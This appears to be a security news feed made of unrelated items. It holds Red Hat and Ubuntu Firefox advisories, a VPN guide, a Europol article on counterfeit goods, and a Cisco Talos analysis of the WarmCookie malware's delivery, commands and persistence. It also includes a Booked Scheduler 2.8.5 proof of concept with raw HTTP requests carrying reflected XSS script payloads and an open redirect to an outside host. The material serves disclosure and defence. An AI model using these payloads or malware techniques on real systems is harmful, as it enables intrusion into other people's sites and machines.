Red Hat Security Advisory 2024-8722-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include cross site scripting, denial of service, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8722.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: firefox security update  
Advisory ID:        RHSA-2024:8722-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8722  
Issue date:         2024-11-01  
Revision:           03  
CVE Names:          CVE-2024-10458  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* firefox: thunderbird: History interface could have been used to cause a Denial of Service condition in the browser (CVE-2024-10464)

* firefox: thunderbird: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response (CVE-2024-10461)

* firefox: thunderbird: Permission leak via embed or object elements (CVE-2024-10458)

* firefox: thunderbird: Use-after-free in layout with accessibility (CVE-2024-10459)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4 (CVE-2024-10467)

* firefox: thunderbird: Clipboard \"paste\" button persisted across tabs (CVE-2024-10465)

* firefox: DOM push subscription message could hang Firefox (CVE-2024-10466)

* firefox: thunderbird: Cross origin video frame leak (CVE-2024-10463)

* firefox: thunderbird: Origin of permission prompt could be spoofed by long URL (CVE-2024-10462)

* firefox: thunderbird: Confusing display of origin for external protocol handler prompt (CVE-2024-10460)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-10458

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2322424  
https://bugzilla.redhat.com/show_bug.cgi?id=2322425  
https://bugzilla.redhat.com/show_bug.cgi?id=2322428  
https://bugzilla.redhat.com/show_bug.cgi?id=2322429  
https://bugzilla.redhat.com/show_bug.cgi?id=2322433  
https://bugzilla.redhat.com/show_bug.cgi?id=2322434  
https://bugzilla.redhat.com/show_bug.cgi?id=2322438  
https://bugzilla.redhat.com/show_bug.cgi?id=2322439  
https://bugzilla.redhat.com/show_bug.cgi?id=2322440  
https://bugzilla.redhat.com/show_bug.cgi?id=2322444

Red Hat Security Advisory 2024-8722-03

Red Hat Security Advisory 2024-8721-03 - An update for firefox is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions. Issues addressed include cross site scripting, denial of service, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8721.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: firefox security update  
Advisory ID:        RHSA-2024:8721-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8721  
Issue date:         2024-11-01  
Revision:           03  
CVE Names:          CVE-2024-10458  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* firefox: thunderbird: History interface could have been used to cause a Denial of Service condition in the browser (CVE-2024-10464)

* firefox: thunderbird: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response (CVE-2024-10461)

* firefox: thunderbird: Permission leak via embed or object elements (CVE-2024-10458)

* firefox: thunderbird: Use-after-free in layout with accessibility (CVE-2024-10459)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4 (CVE-2024-10467)

* firefox: thunderbird: Clipboard \"paste\" button persisted across tabs (CVE-2024-10465)

* firefox: DOM push subscription message could hang Firefox (CVE-2024-10466)

* firefox: thunderbird: Cross origin video frame leak (CVE-2024-10463)

* firefox: thunderbird: Origin of permission prompt could be spoofed by long URL (CVE-2024-10462)

* firefox: thunderbird: Confusing display of origin for external protocol handler prompt (CVE-2024-10460)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-10458

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2322424  
https://bugzilla.redhat.com/show_bug.cgi?id=2322425  
https://bugzilla.redhat.com/show_bug.cgi?id=2322428  
https://bugzilla.redhat.com/show_bug.cgi?id=2322429  
https://bugzilla.redhat.com/show_bug.cgi?id=2322433  
https://bugzilla.redhat.com/show_bug.cgi?id=2322434  
https://bugzilla.redhat.com/show_bug.cgi?id=2322438  
https://bugzilla.redhat.com/show_bug.cgi?id=2322439  
https://bugzilla.redhat.com/show_bug.cgi?id=2322440  
https://bugzilla.redhat.com/show_bug.cgi?id=2322444

Red Hat Security Advisory 2024-8721-03

Red Hat Security Advisory 2024-8720-03 - An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include cross site scripting, denial of service, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8720.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: firefox security update  
Advisory ID:        RHSA-2024:8720-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8720  
Issue date:         2024-11-01  
Revision:           03  
CVE Names:          CVE-2024-10458  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* firefox: thunderbird: History interface could have been used to cause a Denial of Service condition in the browser (CVE-2024-10464)

* firefox: thunderbird: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response (CVE-2024-10461)

* firefox: thunderbird: Permission leak via embed or object elements (CVE-2024-10458)

* firefox: thunderbird: Use-after-free in layout with accessibility (CVE-2024-10459)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4 (CVE-2024-10467)

* firefox: thunderbird: Clipboard \"paste\" button persisted across tabs (CVE-2024-10465)

* firefox: DOM push subscription message could hang Firefox (CVE-2024-10466)

* firefox: thunderbird: Cross origin video frame leak (CVE-2024-10463)

* firefox: thunderbird: Origin of permission prompt could be spoofed by long URL (CVE-2024-10462)

* firefox: thunderbird: Confusing display of origin for external protocol handler prompt (CVE-2024-10460)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-10458

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2322424  
https://bugzilla.redhat.com/show_bug.cgi?id=2322425  
https://bugzilla.redhat.com/show_bug.cgi?id=2322428  
https://bugzilla.redhat.com/show_bug.cgi?id=2322429  
https://bugzilla.redhat.com/show_bug.cgi?id=2322433  
https://bugzilla.redhat.com/show_bug.cgi?id=2322434  
https://bugzilla.redhat.com/show_bug.cgi?id=2322438  
https://bugzilla.redhat.com/show_bug.cgi?id=2322439  
https://bugzilla.redhat.com/show_bug.cgi?id=2322440  
https://bugzilla.redhat.com/show_bug.cgi?id=2322444

Red Hat Security Advisory 2024-8720-03

Ubuntu Security Notice 7086-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-7086-1October 31, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-10458CVE-2024-10459, CVE-2024-10460, CVE-2024-10461, CVE-2024-10462,CVE-2024-10463, CVE-2024-10464, CVE-2024-10465, CVE-2024-10466,CVE-2024-10467, CVE-2024-10468)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  firefox                         132.0+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-7086-1  CVE-2024-10458, CVE-2024-10459, CVE-2024-10460, CVE-2024-10461,  CVE-2024-10462, CVE-2024-10463, CVE-2024-10464, CVE-2024-10465,  CVE-2024-10466, CVE-2024-10467, CVE-2024-10468Package Information:  https://launchpad.net/ubuntu/+source/firefox/132.0+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-7086-1

Booked Scheduler version 2.8.5 suffers from cross site scripting and open redirection vulnerabilities.

    # Exploit Title: Open Redirect / Reflected XSS - booked-schedulerv2.8.5# Date: 10/2024# Exploit Author: Andrey Stoykov# Version: 2.8.5# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.htmlhttps://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.htmlOpen Redirect:Steps to Reproduce:1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP2. In the "resume" parameter add the redirect URL e.g. Burp Collab3. Forward the requestindex.php// HTTP POST login requestPOST /Bookedbo8effotfu/Web/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0[...]email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg// HTTP responseHTTP/1.1 302 FoundDate: Sat, 12 Oct 2024 12:09:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.comContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8Reflected XSS:reservation.php// HTTP GET requestGET/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;new_version=v%3D2.8.5%2Cfs%3D1728734988;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brDnt: 1Sec-Gpc: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 12 Oct 2024 12:23:55 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 14003<h5><ahref="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Returnto the last page that you were on</a></h5></div>schedule.php// HTTP GET requestGET/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;schedule_calendar_toggle=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 19 Oct 2024 09:12:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 7853<h5><ahref="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Returnto the last page that you were on

Booked Scheduler 2.8.5 Cross Site Scripting / Open Redirection

Find the best VPN for streaming with essential features like high-speed servers, strong encryption, streaming optimization, and broad…

Find the best VPN for streaming with essential features like high-speed servers, strong encryption, streaming optimization, and broad device compatibility. Enjoy seamless access to geo-restricted content securely.

Some geo-restricted content can only be unlocked and streamed using a Virtual Private Network (VPN). A VPN for streaming services allows you to watch content seamlessly while protecting your online identity.

With so many VPNs available, not all perform equally, making it challenging to find the best VPNs without interruptions. In this article, we’ll break down essential features to consider when selecting the top VPNs for streaming.

**Server Locations and Coverage**

An important feature in a streaming VPN is server locations and coverage, which determine the content you can access. Choose a VPN with a wide range of high-speed servers to prevent connectivity issues. A strong network spread across multiple countries will allow access to geo-restricted content. Look for VPN providers that frequently update servers, as this indicates a commitment to maintaining quality.

**Speed and Bandwidth**

To support HD streaming, ensure your VPN offers speeds of at least 100 Mbps, with no bandwidth limits or throttling. A VPN optimized for streaming should minimize buffering and reduce latency for smoother content loading.

****Encryption and Security****

When choosing a VPN for streaming, prioritize strong encryption and security. Look for AES-256 encryption or higher, and support for OpenVPN, IKEv2, and WireGuard protocols. The VPN should also include DNS leak protection to keep your IP address secure. If the VPN connection drops, an automatic internet disconnect feature ensures data remains private. These protections ensure that your data will not be exposed to third parties.

****Streaming Optimization****

Streaming optimization is key. The VPN should be optimized for high-speed, low-latency streaming, with custom protocols tailored to this purpose. Look for features that automatically select the best server for streaming, reducing buffering and enhancing speed.

****Device Compatibility****

Your VPN should support all the devices you plan to connect, including Windows, macOS, iOS, Android, and Linux. Look for compatibility with smart TVs (such as Samsung TV, Android TV, and Apple TV) and gaming consoles (PlayStation, Xbox, Nintendo Switch). It should also work with popular streaming platforms like Roku, Chromecast, and Amazon Fire TV. Browser extensions for Chrome, Firefox, and Safari add versatility, making it easier to stream across multiple devices.

****Simultaneous Connections****

Choose a VPN that supports at least five simultaneous connections. This feature lets you connect multiple devices without altering individual settings, which is convenient for families or business use. Check the VPN documentation for setup guides and confirm compatibility with less common devices like Linux and Chromebook. Additionally, look for split tunneling to configure specific device connections.

****Customer Support****

Reliable customer support is essential when using a VPN for streaming. Quick access to assistance for any issues or questions is critical. Look for providers that offer guides, FAQs, and tutorials for self-help, and a prompt email response time (ideally within 3 hours). Social media support is a plus. Effective customer support indicates a provider’s commitment to user satisfaction and technical support.

****Pricing and Payment Options****

Consider affordability and payment flexibility. Some VPNs offer discounts for long-term plans, free trials, money-back guarantees, and even cryptocurrency options. Make sure you’re getting value for your investment and review refund policies carefully. Look out for hidden fees or sudden price hikes, and ensure pricing transparency before subscribing.

****Logging Policy****

Opt for a VPN with a strict no-logs policy. It should avoid storing IP addresses, tracking online activities, or saving connection metadata. This policy helps ensure your privacy, reduces data breach risks, and underscores the VPN’s commitment to protecting client data.

****Compatibility with Popular Streaming Services****

Ensure the VPN is compatible with major streaming platforms you want to access, such as Netflix, Disney+, Hulu, Amazon Prime Video, HBO Max, and BBC iPlayer. Compatibility with these services ensures a smooth streaming experience and value for your subscription.

****Conclusion****

When selecting a VPN for streaming, consider these key features to make an informed choice. Look for speed, encryption, extensive server locations, streaming optimization, and privacy protections. Ensure the VPN provider doesn’t store user data and that its pricing, support, and device compatibility meet your expectations. Taking these steps will give you the best streaming experience while maintaining your online privacy.

1.  **Everything you need to know about VPN tracking**
2.  **Almost Every Major Free VPN Service is a Glorified Data Farm**
3.  **Surfshark VPN Data Breach Awareness with See-Through Toilet**
4.  **ASUS and NordVPN Partner to Integrate VPN Service into Routers**
5.  **Google Launches Verification Badges for Security Tested VPN Apps**

Top VPN Features to Consider When Choosing the Right Streaming Service

There is a whole ecosystem behind the sales and distribution of counterfeit goods. Best to tay away from them.

With the holidays around the bend, many are looking for gifts for their family and friends. And since we somehow decided we want to give more each time, we’re also looking for good deals.

But European law enforcement agency Europol issued a warning about buying fake goods. Sure, they are cheaper, but they do come with a dark side.

According to Europol’s report titled “Uncovering the ecosystem of intellectual property crime, ”approximately 86 million fake items were seized in the European Union (EU) in 2022 alone, with an estimated total value exceeding EUR 2 billion (US$ 2.1 billion).

Not only does this ecosystem provide buyers with substandard goods, it also enables crimes like intellectual property (IP) crime, cybercrime, money laundering, and environmental crime.

Intellectual property is what drives innovation. Criminals don’t come up with new inventions, they just create cheap copies of popular items without regards for safety of the product, working conditions, or environmental regulations. The only thing counterfeiters are innovating are ways to exploit consumer demand for counterfeit and pirated goods.

The report states:

> “The rise of social media, influencers and online commerce have changed consumers’ behavior, increasing their appetite for IP infringing goods or content, while having a low awareness of risks.”

Criminals fully abuse the social media platform algorithms that reach potential buyers using customized ads that speak to their personal interests and preferences. These are often removed after automated reviews.

So, there is another critical role in advertising counterfeit goods, which are influencers. Through their channels, influencers may direct customers to product listings on online stores that evade security protocols about counterfeit adverts.

By buying counterfeit goods you are also unwittingly enabling cybercriminals that are engaged in fraud, corruption, labor exploitation, environmental crime, money laundering, and cybercrime.

On the other hand, the risks of getting caught and the relatively low penalties make IP crime a low-risk, high-benefit criminal activity.

Consumers, however, are not always aware of the fact they are buying counterfeit goods. As sophisticated technologies are used to replicate holograms, logos, and packaging, unaware consumers are more likely than ever to be deceived, and recognizing counterfeit items has become a task that requires specific knowledge and an expert eye.

**How to avoid counterfeit goods**

Nonetheless, there are a few pointers to be given on how to avoid buying counterfeit goods.

*   Where possible, buy from the brand’s own store. When that’s not an option look for authorized retailers. Many brands publish lists of authorized sellers on their websites. And some of the larger webstores use “Authenticity Guarantee” badges on their listings.
*   When it comes to pricing, follow the old saying: “If it’s too good to be true, it probably is.”
*   A legitimate webstore should have contact information, look professional, and specify consumer rights.
*   Review advertisements on social media, influencer channels, and chat platforms with a little bit of extra caution.
*   Look for consumer reviews. Interestingly, it could be a red flag if the reviews of the product and company are universally bad—or if there are no bad reviews at all.

If you’re not completely sure about the product or the website, at least make sure to use a secured payment page and preferably use your credit card, in case you need to recover your money.

If you have bought a counterfeit product:

*   Stop and think before you use it, to consider whether it is safe to use. The materials used for production are likely to be sub-standard and could pose a risk to your health.
*   Report it to the platform where you made the purchase and to the legitimate brand.
*   Report it to the proper authorities.

Use Malwarebytes Browser Guard to block advertisements, scams, and trackers. It’s a free browser extension for Chrome, Firefox, Edge, and Safari.

 Europol warns about counterfeit goods and the criminals behind them 

WarmCookie is a malware family that emerged in April 2024 and has been distributed via regularly conducted malspam and malvertising campaigns.

Wednesday, October 23, 2024 06:02

*   WarmCookie is a malware family that emerged in April 2024 and has been distributed via regularly conducted malspam and malvertising campaigns. 
*   WarmCookie, observed being used for initial access and persistence, offers a means for continuous long-term access to compromised environments and is used to facilitate delivery of additional malware such as CSharp-Streamer-RAT and Cobalt Strike. 
*   Post-compromise intrusion activity associated with WarmCookie overlaps with previously observed activity we attribute to TA866.  
*   We assess that WarmCookie was likely developed by the same threat actor(s) as Resident backdoor, a post-compromise implant previously deployed in intrusion activity that Cisco Talos attributes to TA866.  

**What is WarmCookie? **

WarmCookie, also known as BadSpace, is a malware family that has been distributed since at least April 2024. Throughout 2024, we have observed several distribution campaigns conducted using a variety of lure themes to entice victims to take actions that result in malware infection.  

These campaigns typically rely on malspam or malvertising to initiate the infection process that results in the delivery of WarmCookie. WarmCookie offers a variety of useful functionality for adversaries including payload deployment, file manipulation, command execution, screenshot collection and persistence, making it attractive to use on systems once initial access has been gained to facilitate longer-term, persistent access within compromised network environments.  

In previously analyzed intrusion activity involving WarmCookie, we have observed that it is used as an initial payload and that CSharp-Streamer-RAT and Cobalt Strike were delivered following the initial WarmCookie infection.  

While analyzing the campaigns, intrusion activity, and infrastructure associated with WarmCookie over the course of 2024, we also identified multiple overlaps with activity conducted by TA866 in 2023. 

**Typical infection chains **

As previously mentioned, we have observed WarmCookie campaigns being conducted since at least April 2024. These campaigns rely on malspam or malvertising to facilitate the delivery of malicious content.  

In the case of malspam, we have observed consistent use of invoice-related and job agency themes that entice victims to access hyperlinks present in either the email body, or within attached documents, such as PDFs.  

Examples of common message subjects observed in campaigns conducted between April and August 2024 are listed below. 

*   United Rentals Inc: Invoice# [0-9]{9}\-[0-9]{3} 
*   Invoice and Remittance

In a recent campaign conducted in August, the messages contained PDF attachments. The attachment filenames were randomized but typically use the following format. 

*   Attachment_[0-9]{3}\-[0-9]{3}\.pdf

While there have been variations over time, below is a representative example of one of these emails and the associated PDF attachment. 

__WarmCookie emails and attachments.__

The PDFs contain hyperlinks that direct victims to web servers hosting malicious JavaScript files that continue the infection process. 

We have also observed WarmCookie campaigns leveraging infrastructure associated with traffic distribution and malware delivery systems. In one early campaign, we observed the use of the LandUpdates808 cluster of infrastructure described here. In observed cases, malicious JavaScript downloaders were being hosted at the following paths on servers associated with the LandUpdates808 cluster of web servers. 

/wp-content/upgrade/update\[.\]php

Regardless of whether the delivery stage of the attack was conducted via malspam or malvertising, an obfuscated JavaScript downloader is delivered that is responsible for continuing the infection process. We have observed the use of ZIP archives to compress the JavaScript file and the delivery of the JavaScript file directly from the distribution infrastructure.  

When executed, it deobfuscates and executes a PowerShell command that uses Bitsadmin to retrieve and execute the WarmCookie DLL using syntax, like that shown below. 

__PowerShell execution.__

We have observed a relatively small number of distribution servers hosting WarmCookie DLLs compared to the infrastructure used in earlier stages of the infection chain.  

**WarmCookie **

The main WarmCookie payload has been extensively analyzed in prior reporting here and here. While performing this research, newly observed WarmCookie samples were reported on social media during September 2024. We observed significant additions and changes in this latest version that demonstrate the threat actor is continuing to improve their tooling.  

We observed changes to the way the malware is executed and how persistence is achieved on infected systems. As described in prior reporting, the malware is typically delivered and executed as a PE DLL or a PE EXE. If the payload is in the DLL format, it is typically executed with specific command-line parameters that determine whether persistence should be achieved.  

In previous WarmCookie samples the execution was consistent with the following: 

rundll32.exe <DLL\_Filename>,Start /p

In the latest samples analyzed, this command-line syntax has been modified as follows: 

rundll32.exe <DLL\_Filename>,Start /u

Additionally, the user agent used during C2 communications in previous WarmCookie samples featured extraneous spaces not consistent with normal user agent strings seen in the wild. This allowed for easy detection of WarmCookie C2 activity via network traffic inspection. In the latest WarmCookie samples, this mistake has been corrected. Below is a comparison between the old and new user agent strings used during C2 communications. 

Old User Agent: 

Mozilla / 4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;.NET CLR 1.0.3705)

New User Agent: 

Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

We also observed the inclusion of a new self-updating mechanism that would enable an attacker to dynamically deliver updates to WarmCookie via the C2 server, however, this functionality did not appear to be fully implemented in the analyzed sample at the time. 

In the latest sample, changes were made to the sandbox detection mechanism present in the malware where some checks present in previous versions have been removed. 

__WarmCookie sandbox detection.__

Several changes to the C2 commands supported by the malware have also been made in the latest WarmCookie samples analyzed. The command to remove persistence and the malware itself has been deleted. New commands have been added as follows: 

*   **Command 0x8:** Supports the creation of a DLL file received from the C2 server that is assigned a temporary filename and then executed by WarmCookie.   
*   **Command 0xA**: Appears to be a prepared update command, it is like Command 0x8, but adds hardcoded parameters to the DLL:    
    C:\Windows\System32\rundll32.exe <tmpfilename.dll> Start /update
*   **Command 0xB**: Supports moving the malware to a temporary file name and location and deletes the previously scheduled task. It prepends the string ‘dat’ to the temporary filename. It also exits the C2 loop, leading to termination of the malware process. 

During the malware’s initialization and startup phase, the /update parameter of the Command 0xA is checked to determine if the parameter was set. Regardless of the result of this check, the same function is executed, as shown below. 

WarmCookie update parameter. 

Analysis suggests that the malware will continue to evolve moving forward as the threat actor continues to improve on it and adds additional functionality as needed. 

**Links to past intrusion activity **

While analyzing the distribution campaigns, infrastructure used, and post-compromise intrusion activity associated with WarmCookie, we identified multiple overlaps with previously observed malicious activity.  

In earlier WarmCookie distribution campaigns, threat actors relied on lures that appear as if they were associated with talent/job search agencies. As mentioned here, the lure documents and landing pages associated with this campaign are like those used by distributors of Ursnif in past campaigns.  

While analyzing intrusion activity associated with WarmCookie, we observed the deployment of CSharp-Streamer-RAT as a follow-on payload following the initial system compromise. CSharp-Streamer-RAT is a full-featured remote access trojan that offers robust functionality as described here.  

In this case, the sample reached out to a C2 server that was configured to use an SSL certificate that appeared to have been programmatically generated with several fields randomly populated. Using Regular Expressions to identify other servers with similar SSL characteristics, we identified three additional C2 servers, all previously associated with CSharp-Streamer-RAT samples. One of these C2 servers was observed being used by a CSharp-Streamer-RAT sample we identified in a previous intrusion that we assess with high confidence was conducted by TA866.  

The screenshot below shows the relevant fields present within the SSL certificate associated with the CSharp-Streamer-RAT C2 server observed in previous intrusion activity we attribute to TA866.  

__Previous CSharp-Streamer-RAT C2 SSL certificate.__

Below is an example of one of the SSL certificates associated with the CSharp-Streamer-RAT C2 server observed in recent WarmCookie intrusion activity. 

__Recent CSharp-Streamer-RAT C2 SSL certificate.__

Based on analysis of the system involved in this prior intrusion activity, we assess with high confidence that TA866/Asylum Ambuscade deployed CSharp-Streamer-RAT while directly operating on the system leading up to, during, and after its deployment. In the recent WarmCookie case, we also assess with high confidence that the attacker who deployed WarmCookie also deployed CSharp-Streamer-RAT following the initial compromise.

**WarmCookie vs. Resident backdoor **

As referenced here, and in prior reporting, TA866/Asylum Ambuscade has been observed delivering a post-compromise implant called Resident backdoor in prior intrusion activity. Prior reporting on WarmCookie has alluded to observed links between Resident backdoor and WarmCookie.

We performed a code and function level analysis of Resident backdoor samples from previous intrusion activity and WarmCookie samples from September 2024 and observed several notable similarities in the way core functionality has been implemented across both malware families. WarmCookie appears to contain much of the same functionality as Resident backdoor but has been significantly extended to support additional functionality.  

We assess that both were likely developed by the same entity based on the following analysis findings: 

*   The RC4 implementation is consistent across both malware families. 
*   The RC4 string decryption function implementation is consistent across both malware families. 
*   Mutex management is performed consistently across both malware families. 
*   Both malware families use GUID-like strings for the mutex. 
*   The way in which various functions were constructed and the coding conventions used is consistent. 
*   The definition of scheduled tasks to achieve persistence is consistent. 
*   Both malware families wait one minute before executing the scheduled task. 
*   The directory, file schema and parameters are similar in both malware families.  
*   The initial startup logic and command line parameter implementation are similar. 

**Code similarity analysis **

We conducted a similarity analysis of the code execution flow between both Resident backdoor and a recent WarmCookie sample that was shared on social media. We observed consistent implementation of core functionality across both as well as consistent use of coding conventions across both malware families. 

**Task Scheduler implementation **

If the malware is initially executed without supplying any parameters, both Resident and WarmCookie first determine if the initially launched application was a PE DLL or an PE EXE. Depending on the result, they either create a filename with the extension “.dll" or “.exe". Also based on the results of this test, they both create a scheduled task via the Windows Task Scheduler, which spawns a copy of the malware after waiting for 60 seconds. In the case that the initially launched application was a PE DLL, rundll32.exe is used to launch the malware. In the case of a PE EXE file, it is executed directly.  

They both attempt this in the %ALLUSERSPROFILE% directory, if that fails, they try it again in %ALLDATA% directory. 

__WarmCookie startup parameters.__

__WarmCookie persistence mechanism.__

__Resident backdoor startup parameters.__

__Resident backdoor persistence mechanism.__

__Resident backdoor persistence mechanism (cont’d).__

